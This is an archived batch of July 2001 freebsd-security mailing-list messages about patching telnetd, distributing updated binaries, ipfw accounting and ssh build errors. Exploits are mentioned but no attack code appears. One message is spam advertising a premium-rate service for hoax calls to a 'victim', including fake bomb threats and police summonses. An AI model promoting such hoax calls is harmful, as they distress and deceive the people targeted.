From owner-freebsd-security Thu Jul 26 6:19:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from APastourelles-102-1-2-26.abo.wanadoo.fr (APastourelles-102-1-2-26.abo.wanadoo.fr [217.128.208.26]) by hub.freebsd.org (Postfix) with ESMTP id 1D21337B401 for ; Thu, 26 Jul 2001 06:19:50 -0700 (PDT) (envelope-from olive@deep-ocean.net) Received: by APastourelles-102-1-2-26.abo.wanadoo.fr (Postfix, from userid 1001) id F342D2556E; Thu, 26 Jul 2001 15:19:48 +0200 (CEST) Date: Thu, 26 Jul 2001 15:19:48 +0200 From: Olivier Cortes To: freebsd-security@freebsd.org Subject: Re: Re: [Q] distribution of patched binaries for security fixes.
Message-ID: <20010726151948.A95770@APastourelles-102-1-2-26.abo.wa> Mail-Followup-To: Olivier Cortes , freebsd-security@freebsd.org References: <20010726043657.B42611@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010726043657.B42611@xor.obsecurity.org>; from kris@obsecurity.org on Thu, Jul 26, 2001 at 04:36:57AM -0700 X-Operating-System: FreeBSD 4.3-RC i386 up 7 days, 10:35, 1 user, load averages: 0.14, 0.25, 0.17 Organization: Deep-Ocean Network X-URL: http://www.deep-ocean.net/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Thu, Jul 26, 2001 at 04:36:57AM -0700, Kris Kennaway wrote:
> There are any number of tools you can use to distribute files: tar +
> scp, rsync, cvsup, 'make release' to make a full installation mirror,
> etc. If you want to automate the installation further you could
> create your own packages using pkg_create: this is very easy to do if
> you use the ports framework.

Here I make heavy use of rsync + scp to update my web sites mirror. I didn't think about it to sync my systems...

Saying that every BSD machine is in securelevel 2 with [/usr]/[s]bin[/*] chflagged to schg, do you think that "pkg_create" is a better solution than make world on every one? (I've got 4 FreeBSD 4.3-STABLE.)

[I remember some persons didn't agree with this protection method. Do you have any URL to point me to in order to discuss this subject (again?)]

With pkg_create, do I pack the binaries? Do I pack everything in the dirs mentioned before? How to trace only the changed binaries (the cvsup log?)? Which method do you prefer? (For now I make world everywhere...) Is there any URL or doc where some of them are already discussed (in order not to spend your time on it)?
Regards,
---
Olivier Cortes
free software admin

From owner-freebsd-security Thu Jul 26 6:21:13 2001
Delivered-To: freebsd-security@freebsd.org
Received: from internethelp.ru (wh.internethelp.ru [212.113.112.145]) by hub.freebsd.org (Postfix) with ESMTP id 70DF337B401 for ; Thu, 26 Jul 2001 06:21:04 -0700 (PDT) (envelope-from nkritsky@internethelp.ru)
Received: from IBMKA (ibmka.internethelp.ru. [192.168.0.6]) by internethelp.ru (8.9.3/8.9.3) with ESMTP id RAA95159 for ; Thu, 26 Jul 2001 17:20:58 +0400 (MSD)
Date: Thu, 26 Jul 2001 17:21:01 +0400
From: "Nickolay A.Kritsky"
X-Mailer: The Bat! (v1.49) Personal
Reply-To: "Nickolay A.Kritsky"
Organization: IHelp
X-Priority: 3 (Normal)
Message-ID: <7167463367.20010726172101@internethelp.ru>
To: security@FreeBSD.ORG
Subject: accounting with ipfw (gid, uid rules)
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hi, all.

I am not sure if my question has something to do with security, but
people in this list have some _huge_ amount of ipfw, natd and TCP/IP
experience, which they can share with me. :)

I have started accounting of IP traffic on my ISP2office gateway. I want
to implement this via the 'ipfw add count' command, using its 'gid' and
'uid' parameters.
I have put some counters:

Rule 19 is quite simple:

    00019 count ip from any to any via rl0

It shows me how many packets were seen on interface rl0 (it is my
external interface).

Rule 1010 consists of some rules which should count all traffic
generated by the router itself, sorted by uid:

    01010 count ip from any to 212.113.112.145 via rl0
    01010 count ip from 212.113.112.145 to any via rl0
    01010 count ip from any to 212.113.112.145 uid nobody via rl0
    01010 count ip from any to 212.113.112.145 uid root via rl0
    01010 count ip from any to 212.113.112.145 uid httpd via rl0
    01010 count ip from any to 212.113.112.145 uid ftp via rl0
    01010 count ip from 212.113.112.145 to any uid nobody via rl0
    01010 count ip from 212.113.112.145 to any uid root via rl0
    01010 count ip from 212.113.112.145 to any uid httpd via rl0
    01010 count ip from 212.113.112.145 to any uid ftp via rl0

    su-2.03# ipfw show 19 1010
    <-------------------------start------------------------>
    00019 3215329 1163463543 count ip from any to any via rl0
    01010 1118838 920747034 count ip from any to 212.113.112.145 via rl0
    01010 1224240 90608036 count ip from 212.113.112.145 to any via rl0
    01010 2098 231284 count ip from any to 212.113.112.145 uid nobody via rl0
    01010 913617 710773596 count ip from any to 212.113.112.145 uid root via rl0
    01010 117 8768 count ip from any to 212.113.112.145 uid httpd via rl0
    01010 0 0 count ip from any to 212.113.112.145 uid ftp via rl0
    01010 7660 466991 count ip from 212.113.112.145 to any uid nobody via rl0
    01010 963148 79260085 count ip from 212.113.112.145 to any uid root via rl0
    01010 36 1566 count ip from 212.113.112.145 to any uid httpd via rl0
    01010 0 0 count ip from 212.113.112.145 to any uid ftp via rl0
    <-------------------------end-------------------------->

According to sockstat, the only users that currently have allocated
sockets are nobody, httpd, ftp, root - Squid, Apache, ftpd, everything
other (in the same order). "Everything other" are mostly sendmail,
popper and natd.
Here are the questions:

Why is the whole traffic to and from the router

    920747034 + 90608036 = 1011355070

but the sum of the traffic counters sorted by uid is

    231284 + 710773596 + 8768 + 0 + 466991 + 79260085 + 1566 + 0 = 790742290

The difference is big:

    1011355070 - 790742290 = 220612780 > 210 Mb

Where did I make an error, or who is lying to me here: ipfw, sockstat?

Has anybody used uid/gid sorting in ipfw? Is it reliable?

So many questions... Any help is very good.

NK

;-------------------------------------------
; NKritsky
; SysAdmin InternetHelp.Ru
; http://www.internethelp.ru
; mailto:nkritsky@internethelp.ru

From owner-freebsd-security Thu Jul 26 6:22:45 2001
Delivered-To: freebsd-security@freebsd.org
Received: from prime.gushi.org (prime.gushi.org [208.23.118.172]) by hub.freebsd.org (Postfix) with ESMTP id 2E14637B409; Thu, 26 Jul 2001 06:22:37 -0700 (PDT) (envelope-from danm@prime.gushi.org)
Received: from localhost (danm@localhost) by prime.gushi.org (8.11.3/8.11.3) with ESMTP id f6QDJLL09461; Thu, 26 Jul 2001 09:19:21 -0400 (EDT)
Date: Thu, 26 Jul 2001 09:19:20 -0400 (EDT)
From: "Dan Mahoney, System Admin"
To: security@freebsd.org
Cc: security-officer@freebsd.org
Subject: Mistake in security advisory.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

I'd like to point out what I think is a slight error in the security
advisory, although I may be wrong about this. Watch for my C-style
comments below:

    # ls /usr/src/crypto/telnet/telnetd

A response of

    ls: /usr/src/crypto/telnet/telnetd: No such file or directory

indicates you do not have the sources present and should download the
non-crypto-telnet patch.
These patches have been verified to apply to FreeBSD 4.2-RELEASE,
4.3-RELEASE and 3.5.1-STABLE dated prior to 2001-07-20 (users of
3.5.1-RELEASE must have applied the patches from FreeBSD Security
Advisory 00:69 prior to applying this patch). These patches may or may
not apply to older, unsupported releases of FreeBSD.

2a) For systems with the crypto-telnet sources installed

Download the patch and the detached PGP signature from the following
locations, and verify the signature using your PGP utility.

    ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd-crypto.patch
    ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd-crypto.patch.asc

/* This patch applies cleanly to 3.5.1-STABLE systems, and the above
   directory exists. */

    # cd /usr/src/
    # patch -p < /path/to/patch
    # cd /usr/src/secure/libexec/telnetd
    # make depend && make all install

/* This directory does NOT exist, only /usr/src/libexec/telnetd exists
   in 3.5.1-STABLE */

2b) For systems without the crypto-telnet sources installed

Download the patch and the detached PGP signature from the following
locations, and verify the signature using your PGP utility.

    ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd.patch
    ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd.patch.asc

    # cd /usr/src/
    # patch -p < /path/to/patch
    # cd /usr/src/libexec/telnetd
    # make depend && make all install

/* Yet this command appears to build the telnet daemon with the applied
   patches. Can someone confirm this for me? For what it's worth, the
   above advisory confused me, so I simply re-cvsupped my entire source
   tree, and then followed the instructions immediately above. */

Perchance a correction can save someone else the same trouble.

-Dan Mahoney

--
"Don't be so depressed dear."
"I have no endorphins, what am I supposed to do?"
-DM and SK, February 10th, 1999

--------Dan Mahoney--------
Techie, Sysadmin, WebGeek
Gushi on efnet/undernet IRC
ICQ: 13735144 AIM: LarpGM
Web: http://prime.gushi.org
finger danm@prime.gushi.org for pgp public key and tel#
---------------------------

From owner-freebsd-security Thu Jul 26 6:52:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cvd.pl (cvd.pl [213.25.82.2]) by hub.freebsd.org (Postfix) with ESMTP id 008AB37B405 for ; Thu, 26 Jul 2001 06:52:15 -0700 (PDT) (envelope-from gdef@cvd.pl)
Received: by cvd.pl (Postfix, from userid 1005) id 3880F13FB1D; Thu, 26 Jul 2001 15:54:00 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1]) by cvd.pl (Postfix) with ESMTP id 1F858F6123; Thu, 26 Jul 2001 15:54:00 +0200 (CEST)
Date: Thu, 26 Jul 2001 15:54:00 +0200 (CEST)
From: "Janusz Mucka (Defacto)"
To: Markus Hallström
Cc: Nuno Teixeira ,
Subject: Re: Updating security fixes without single user mode?
In-Reply-To: <5.0.2.1.2.20010726030631.04de4ec0@students.su.se>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-2
Content-Transfer-Encoding: QUOTED-PRINTABLE

On Thu, 26 Jul 2001, Markus Hallström wrote:

> At 01:57 2001-07-26 +0100, Nuno Teixeira wrote:
> >Hello to all,
> >
> >At my workstation I'm tracking STABLE with no problems.
> >
> >At my server I just want to update the system with security fixes, etc.
> >
> >My question is:
> >
> >Tracking RELEASE_4_3 (for a RELEASE 4.3 system) is a good option, but
> >after makeworld and makekernel, I need to
> >go into single user mode and make installworld and mergemaster.
> >
> >The problem is that my server is at US and I live in Portugal!
> >So, it's impossible to run
> >the system in single user mode.
> >
> >What is the best way of maintaining the system updated without single user mode?
> >
> >Patches? Packages?
> >
> >Thanks in advance,
>
> You can always be a daredevil and make installworld and run mergemaster in
> multiuser mode. It usually works for me ;-)
>
> /TUBBS
>

Look at this: /usr/src/Makefile

    # buildworld   - Rebuild *everything*, including glue to help do
    #                upgrades.
    # installworld - Install everything built by "buildworld".
    # world        - buildworld + installworld.

make world = make buildworld + make installworld

Defacto

From owner-freebsd-security Thu Jul 26 7: 7: 4 2001
Delivered-To: freebsd-security@freebsd.org
Received: from federation.addy.com (addy.com [208.11.142.20]) by hub.freebsd.org (Postfix) with ESMTP id 3A5B137B401 for ; Thu, 26 Jul 2001 07:07:01 -0700 (PDT) (envelope-from jim@federation.addy.com)
Received: from localhost (jim@localhost) by federation.addy.com (8.9.3/8.9.3) with ESMTP id KAA24396 for ; Thu, 26 Jul 2001 10:06:38 -0400 (EDT) (envelope-from jim@federation.addy.com)
Date: Thu, 26 Jul 2001 10:06:38 -0400 (EDT)
From: Jim Sander
Cc: FreeBSD Security
Subject: Re: Telnet exploit & 3.4-RELEASE
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

With all the trouble people seem to be having with this issue, let me
run this by people more "in the know" and see if they think it is likely
to fix things at all...
1) Built up a "new" 3.x box locally, and installed the source (my
   production boxes don't have full source)
2) Applied the patch and built the new telnetd (it's 2K smaller than the
   original, so I know *something* changed)
3) Copied the binary over to the production systems "manually."
4) Restarted inetd

Telnet definitely functions, and the exploit doesn't seem to succeed -
but then it didn't work before either, so who knows for sure. (I'm
probably just using it improperly.)

It seems to me that this should confuse at least the basest
script-kiddies, and really that's what I'm most worried about. The patch
seems to involve only telnetd itself, so my gut says I'm golden. (Or at
least bronzed.)

Comments?

-=Jim=-

From owner-freebsd-security Thu Jul 26 7:46:15 2001
Delivered-To: freebsd-security@freebsd.org
Received: from veldy.net (w028.z064001117.msp-mn.dsl.cnc.net [64.1.117.28]) by hub.freebsd.org (Postfix) with ESMTP id EFDFE37B401 for ; Thu, 26 Jul 2001 07:46:11 -0700 (PDT) (envelope-from veldy@veldy.net)
Received: from HP2500B (localhost.veldy.net [127.0.0.1]) by veldy.net (Postfix) with SMTP id 24AEABAA8; Thu, 26 Jul 2001 09:46:10 -0500 (CDT)
Message-ID: <00f201c115e1$8daee9c0$3028680a@tgt.com>
From: "Thomas T. Veldhouse"
To: "Vladimir Terziev"
References: <200107260732.f6Q7Wrc36388@star.rila.bg>
Subject: Re: Compilation problem with ssh-3.0.1 on FreeBSD 4.3-STABLE box
Date: Thu, 26 Jul 2001 09:45:02 -0500
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200

The error you got would have been nice, if not darn useful. Anyway, I
just compiled it without incident. I use a bash shell. I set CFLAGS to
"-O -pipe -march=i686". I configured as follows:

    ./configure --with-threads --without-ipv6 --with-etcdir=/usr/local/etc/ssh --prefix=/usr/local

I then used gmake to build. I did not install it as I use OpenSSH and am
fine with it.

Tom Veldhouse
veldy@veldy.net

----- Original Message -----
From: "Vladimir Terziev"
Sent: Thursday, July 26, 2001 2:32 AM
Subject: Compilation problem with ssh-3.0.1 on FreeBSD 4.3-STABLE box

>
> Hi all,
>
> I've downloaded a copy of ssh-3.0.1 from ftp.ssh.com. I've tried to compile
> it but I've got an error.
>
> Has anybody succeeded to compile ssh-3.0.1 (ssh from ssh.com)?
>
> regards,
>
>
> Vladimir
>

From owner-freebsd-security Thu Jul 26 10:22:37 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailhub.airlinksys.com (mailhub.airlinksys.com [216.70.12.6]) by hub.freebsd.org (Postfix) with ESMTP id 2F58C37B407 for ; Thu, 26 Jul 2001 10:22:34 -0700 (PDT) (envelope-from sjohn@airlinksys.com)
Received: from sjohn.airlinksys.com (sjohn.airlinksys.com [216.70.12.7]) by mailhub.airlinksys.com (Postfix) with ESMTP id 7B3D353510 for ; Thu, 26 Jul 2001 12:22:25 -0500 (CDT)
Received: by sjohn.airlinksys.com (Postfix, from userid 1000) id 28B265DE4; Thu, 26 Jul 2001 12:22:25 -0500 (CDT)
Date: Thu, 26 Jul 2001 12:22:25 -0500
From: Scott Johnson
To: freebsd-security@FreeBSD.ORG
Subject: Re: [Q] distribution of patched binaries for security fixes.
Message-ID: <20010726122225.A59848@sjohn.airlinksys.com>
Reply-To: Scott Johnson
Mail-Followup-To: freebsd-security@FreeBSD.ORG
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from David_May@allsolutions.com.au on Thu, Jul 26, 2001 at 06:47:21PM +0800

Quoth David_May@allsolutions.com.au on Thu, Jul 26, 2001 at 06:47:21PM +0800:
>
>
> Hello, I am setting up a FreeBSD machine to track the STABLE branch
> and to rebuild the system from time-to-time. The main reason being to
> keep track of security related fixes and enhancements. The documentation
> covers that quite well.
>
> But I was wondering what is a good procedure to distribute updated
> binaries to other machines.
> I have several production machines that I
> would like to keep up-to-date but do not want to compile source on
> every machine.
>
> Being able to create something like a Windows NT service pack
> would be nice :)

I just mount /usr/src and /usr/obj read-only from the build machine, and
install. For kernels, I mount /usr/src only, and build on the target.

If you follow RELENG_4_3 (4.3-RELEASE + security fixes) your life gets
much easier -- no more building world. Just cvsup, build the affected
systems (follow the steps in the security notification), and install on
every machine:

    build_machine# cvsup -g -L 2 supfile
    build_machine# rm -rf /usr/obj/usr/
    build_machine# cd /usr/src/affected_component
    build_machine# make depend && make all install

    target_machine# mount -t nfs build_machine:/usr/src /usr/src
    target_machine# mount -t nfs build_machine:/usr/obj /usr/obj
    target_machine# cd /usr/src/affected_component
    target_machine# make install

If you have a lot of machines to update, rdist + ssh may simplify things
further, transferring binaries and killing and restarting daemons, etc.

These are production machines, right? Why do you want to track -STABLE,
building and installing world all the time? If it ain't broke, don't fix
it!
--
Scott Johnson
System/Network Administrator
Airlink Systems

From owner-freebsd-security Thu Jul 26 13: 3:55 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id AC6AF37B406; Thu, 26 Jul 2001 13:03:49 -0700 (PDT) (envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 8BB096722E; Thu, 26 Jul 2001 13:03:48 -0700 (PDT)
Date: Thu, 26 Jul 2001 13:03:48 -0700
From: Kris Kennaway
To: "Dan Mahoney, System Admin"
Cc: security@freebsd.org, security-officer@freebsd.org
Subject: Re: Mistake in security advisory.
Message-ID: <20010726130347.A49735@xor.obsecurity.org>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="huq684BweRXVnRxX"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from danm@prime.gushi.org on Thu, Jul 26, 2001 at 09:19:20AM -0400

On Thu, Jul 26, 2001 at 09:19:20AM -0400, Dan Mahoney, System Admin wrote:
> # cd /usr/src/
> # patch -p < /path/to/patch
> # cd /usr/src/secure/libexec/telnetd
> # make depend && make all install
>
> /* This directory does NOT exist, only /usr/src/libexec/telnetd exists in
> 3.5.1-Stable */

Sounds like you're not cvsupping the src-secure collection, then.
> # cd /usr/src/
> # patch -p < /path/to/patch
> # cd /usr/src/libexec/telnetd
> # make depend && make all install
>
> /* Yet this command appears to build the telnet daemon with the applied
> patches. Can someone confirm this for me? For what it's worth, the
> above advisory confused me, so I simply re-cvsupped my entire source
> tree, and then followed the instructions immediately above. */

This builds the non-crypto version; as I tried to explain in the
advisory, there are two slightly different versions in the tree.

Kris

From owner-freebsd-security Thu Jul 26 13:53:10 2001
Delivered-To: freebsd-security@freebsd.org
Received: from salvation.unixgeeks.com (cc784475-b.scrmnt1.ca.home.com [65.5.73.160]) by hub.freebsd.org (Postfix) with SMTP id 656BB37B407 for ; Thu, 26 Jul 2001 13:53:08 -0700 (PDT) (envelope-from nathan@salvation.unixgeeks.com)
Received: (qmail 51586 invoked by uid 1001); 26 Jul 2001 20:34:53 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 26 Jul 2001 20:34:53 -0000
Date: Thu, 26 Jul 2001 13:34:53 -0700 (PDT)
From: nathan barrick
Subject: ssh3
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

I downloaded ssh-3.0.1.tar.gz from ssh.com. I configure/make and
everything works fine. No errors. But... if I try to run the ssh client
I get this error:

    Received signal 11.
    (no core)

Any ideas? I can ssh in to the box so I know the daemon still works, but
I can't get the client to work. I've checked on the soft links to make
sure everything is working properly and that it is all going in the
right direction. Everything seems to be. If you have any ideas they'd be
greatly appreciated.

nathan.

From owner-freebsd-security Thu Jul 26 14:13:55 2001
Delivered-To: freebsd-security@freebsd.org
Received: from prime.gushi.org (prime.gushi.org [208.23.118.172]) by hub.freebsd.org (Postfix) with ESMTP id F3B4337B408; Thu, 26 Jul 2001 14:13:50 -0700 (PDT) (envelope-from danm@prime.gushi.org)
Received: from localhost (danm@localhost) by prime.gushi.org (8.11.3/8.11.3) with ESMTP id f6QLATC17172; Thu, 26 Jul 2001 17:10:34 -0400 (EDT)
Date: Thu, 26 Jul 2001 17:10:28 -0400 (EDT)
From: "Dan Mahoney, System Admin"
To: Kris Kennaway
Cc: security@freebsd.org, security-officer@freebsd.org
Subject: Re: Mistake in security advisory.
In-Reply-To: <20010726130347.A49735@xor.obsecurity.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Thu, 26 Jul 2001, Kris Kennaway wrote:

> On Thu, Jul 26, 2001 at 09:19:20AM -0400, Dan Mahoney, System Admin wrote:
>
> > # cd /usr/src/
> > # patch -p < /path/to/patch
> > # cd /usr/src/secure/libexec/telnetd
> > # make depend && make all install
> >
> > /* This directory does NOT exist, only /usr/src/libexec/telnetd exists in
> > 3.5.1-Stable */
>
> Sounds like you're not cvsupping the src-secure collection, then.

From the supfile:

    # These are the individual collections that make up FreeBSD's crypto
    # collection.
    # They are no longer export-restricted and are a part of
    # src-all
    #src-crypto
    #src-secure
    #src-sys-crypto

Unless for some reason I should be using the stable-secure-supfile

-Dan

>
> > # cd /usr/src/
> > # patch -p < /path/to/patch
> > # cd /usr/src/libexec/telnetd
> > # make depend && make all install
> >
> > /* Yet this command appears to build the telnet daemon with the applied
> > patches. Can someone confirm this for me? For what it's worth, the
> > above advisory confused me, so I simply re-cvsupped my entire source
> > tree, and then followed the instructions immediately above. */
>
> This builds the non-crypto version; as I tried to explain in the
> advisory, there are two slightly different versions in the tree.
>
> Kris
>

--
I want to see how you see.

-SK, 6/2/99, 4:30 AM

--------Dan Mahoney--------
Techie, Sysadmin, WebGeek
Gushi on efnet/undernet IRC
ICQ: 13735144 AIM: LarpGM
Web: http://prime.gushi.org
finger danm@prime.gushi.org for pgp public key and tel#
---------------------------

From owner-freebsd-security Thu Jul 26 14:14:45 2001
Delivered-To: freebsd-security@freebsd.org
Received: from windupline.co.uk (ppp-1-65.cvx5.telinco.net [212.1.152.65]) by hub.freebsd.org (Postfix) with SMTP id 09DA537B40A for ; Thu, 26 Jul 2001 14:14:03 -0700 (PDT) (envelope-from myp@windupline.co.uk)
From: "John"
To: "recipient"@FreeBSD.ORG, list@windupline.co.uk
Subject: Have a good laugh!
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Thu, 26 Jul 2001 22:13:48 +0100
Reply-To: "John"
X-Priority: 1 (Highest)
Content-Transfer-Encoding: 8bit
Message-Id: <20010726211403.09DA537B40A@hub.freebsd.org>

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Wind-up A Friend, Colleague, Relative Or Even An Enemy
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Call Windupline and you'll be in stitches!

With our new service you're able to wind-up, confuse and bemuse people
with a choice of bogus callers that you can transfer to your victim on
any UK landline or mobile and then listen in to the call and hear their
reaction

Don't worry though, they won't be able to hear you, nor tell that you
made the call - try it on a speaker phone and a group can hear

-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
Just use the easy to follow recipe:
-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-

(i) choose one ripe victim
(ii) add Windupline by dialling 0906 736 9265 and select
    1 - Wind-up samples
    2 - Mr Angry
    3 - The Irate Delivery Driver
    4 - An Invite To No 10
    5 - There's A Bomb In Your Street
    6 - You're Wanted At The Police Station
    7 - The Tax Inspector
    8 - You've Got My Daughter Pregnant
(iii) enter your victims number and wait for the transfer
(iv) when they answer, prepare yourself and ...enjoy!
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
This has got to be the funniest way to wind-up anyone
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

http://www.windupline.co.uk

Windupline
BCM 1543
London WC1N 3XX
United Kingdom
Tel: +44 (0)8707 469024

-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
Calls to 0906 numbers are charged at £1/min at all times
Maximum call duration 5 mins, average 2 mins
Please ensure you have the permission of the bill payer before calling
-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-

You've received this email as you're on our mailing list
If however, you do not wish to receive any further emails simply
mailto:remove@windupline.co.uk with the email address(es) to be removed
inserted in the subject line
Windupline is a trading name of Portmead UK Ltd who are registered and
operate under UK data protection legislation
We will honour all remove requests
-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-

Portmead UK Ltd
27 Old Gloucester Street
London WC1N 3AF
United Kingdom
Registered in England & Wales 3798100

From owner-freebsd-security Thu Jul 26 14:46:47 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mg.hk5.outblaze.com (202-123-209-152.outblaze.com [202.123.209.152]) by hub.freebsd.org (Postfix) with ESMTP id 9248937B401 for ; Thu, 26 Jul 2001 14:46:43 -0700 (PDT) (envelope-from jian@linuxmail.org)
Received: from ws4.us.outblaze.com (ws4.us.outblaze.com [209.249.164.192]) by mg.hk5.outblaze.com (8.11.2/8.11.2) with SMTP id f6QLkgU17575 for ; Thu, 26 Jul 2001 21:46:42 GMT
Received: (qmail 18022 invoked by uid 1001); 26 Jul 2001 21:46:41 -0000
Message-ID: <20010726214641.18021.qmail@linuxmail.org>
Content-Type: text/plain; charset="iso-8859-1"
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
Mime-Version: 1.0
X-Mailer: MIME-tools 4.104 (Entity 4.117)
Received: from ws4.us.outblaze.com for [210.237.173.114] via web-mailer on Fri, 27 Jul 2001 05:46:41 +0800
From: "jianzhong ren"
To: FreeBSD Security
Date: Fri, 27 Jul 2001 05:46:41 +0800
Subject: some new exploit is out

I just want to let you know that a new exploit is out for FreeBSD at
http://www.hack.co.za/

I know that the patch for telnet is out too, but is there any new patch
for the shared signals vulnerability and portbinding shellcode?

Thank you

--
Get your free email from www.linuxmail.org

Powered by Outblaze

From owner-freebsd-security Thu Jul 26 14:53: 2 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id 2355C37B401 for ; Thu, 26 Jul 2001 14:53:00 -0700 (PDT) (envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 3985067226; Thu, 26 Jul 2001 14:52:59 -0700 (PDT)
Date: Thu, 26 Jul 2001 14:52:58 -0700
From: Kris Kennaway
To: jianzhong ren
Cc: FreeBSD Security
Subject: Re: some new exploit is out
Message-ID: <20010726145258.A78877@xor.obsecurity.org>
References: <20010726214641.18021.qmail@linuxmail.org>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="J/dobhs11T7y2rNN"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010726214641.18021.qmail@linuxmail.org>; from jian@linuxmail.org on Fri, Jul 27, 2001 at 05:46:41AM +0800

On Fri, Jul 27, 2001 at 05:46:41AM +0800, jianzhong ren wrote:

> I know that the patch for telnet is out too, but is there any new patch
> for the shared signals vulnerability

Yes, a while ago. You do read advisories, right?

> and portbinding shellcode?

What's this one?

Kris

From owner-freebsd-security Thu Jul 26 14:54: 0 2001
Delivered-To: freebsd-security@freebsd.org
Received: from lass.merseine.nu (unknown [200.165.5.160]) by hub.freebsd.org (Postfix) with ESMTP id A597F37B401 for ; Thu, 26 Jul 2001 14:53:48 -0700 (PDT) (envelope-from fastjack@lass.merseine.nu)
Received: (from fastjack@localhost) by lass.merseine.nu (8.11.4/8.11.4) id f6OHLlI16938 for security@freebsd.org; Tue, 24 Jul 2001 14:21:47 -0300 (BRT) (envelope-from fastjack)
Date: Tue, 24 Jul 2001 14:21:46 -0300
From: Danilo Castro
To: security@freebsd.org
Subject: Re: telnetd remote root exploit released
Message-ID: <20010724142146.A15574@lass.merseine.nu>
References: <5.1.0.14.0.20010724124021.078d1ec0@marble.sentex.ca>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from wade@ezri.org on Tue, Jul 24, 2001 at 12:54:26 -0400

Hi Wade!
On Tue, 24 Jul 2001, Wade Majors wrote:

> This is the same one we are all patched against now, right?
>
> -Wade

If you updated yer telnetd, yes. The same we are patched against now.

[]s
kobold

From owner-freebsd-security Thu Jul 26 14:58:55 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mg.hk5.outblaze.com (202-123-209-152.outblaze.com [202.123.209.152]) by hub.freebsd.org (Postfix) with ESMTP id 13D9D37B401 for ; Thu, 26 Jul 2001 14:58:51 -0700 (PDT) (envelope-from jian@linuxmail.org)
Received: from ws4.us.outblaze.com (ws4.us.outblaze.com [209.249.164.192]) by mg.hk5.outblaze.com (8.11.2/8.11.2) with SMTP id f6QLwmU21327 for ; Thu, 26 Jul 2001 21:58:49 GMT
Received: (qmail 18999 invoked by uid 1001); 26 Jul 2001 21:58:48 -0000
Message-ID: <20010726215848.18998.qmail@linuxmail.org>
Content-Type: text/plain; charset="iso-8859-1"
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
Mime-Version: 1.0
X-Mailer: MIME-tools 4.104 (Entity 4.117)
Received: from ws4.us.outblaze.com for [210.237.173.114] via web-mailer on Fri, 27 Jul 2001 05:58:48 +0800
From: "jianzhong ren"
To: kris@obsecurity.org
Cc: FreeBSD Security
Date: Fri, 27 Jul 2001 05:58:48 +0800
Subject: Re: some new exploit is out

-----Original Message-----
From: Kris Kennaway <kris@obsecurity.org>
Date: Thu, 26 Jul 2001 14:52:58 -0700
To: jianzhong ren <jian@linuxmail.org>
